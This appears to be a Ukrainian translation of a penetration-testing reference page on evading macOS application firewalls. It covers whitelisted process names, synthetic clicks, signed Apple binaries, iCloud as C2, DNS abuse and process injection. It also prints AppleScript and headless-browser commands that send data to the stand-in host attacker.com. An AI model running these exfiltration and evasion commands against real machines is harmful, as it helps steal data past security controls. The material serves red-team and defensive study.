Знайдені техніки

Наступні техніки були виявлені як працюючі в деяких додатках брандмауерів macOS.

Зловживання іменами білого списку

• Наприклад, назви шкідливого ПЗ можуть бути такими, як відомі процеси macOS, наприклад launchd

Синтетичний клік

• Якщо брандмауер запитує дозвіл від користувача, шкідливе ПЗ може клацнути на дозвіл

Використання підписаних бінарних файлів Apple

• Наприклад, curl, а також інші, такі як whois

Відомі домени Apple

Брандмауер може дозволяти підключення до відомих доменів Apple, таких як apple.com або icloud.com. І iCloud може бути використаний як C2.

Загальний обхід

Деякі ідеї для спроб обхіду брандмауерів

Перевірка дозволеного трафіку

Знання дозволеного трафіку допоможе вам визначити потенційно білі списки доменів або додатки, які мають до них доступ.

lsof -i TCP -sTCP:ESTABLISHED

Зловживання DNS

Розподіл DNS виконується за допомогою підписаної програми mdnsreponder, яка, ймовірно, буде дозволена звертатися до DNS-серверів.

Через програми браузера

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Через впровадження процесів

Якщо ви можете впровадити код в процес, який має дозвіл на підключення до будь-якого сервера, ви можете обійти захист брандмауера:

Посилання

• https://www.youtube.com/watch?v=UlT5KFTMn2k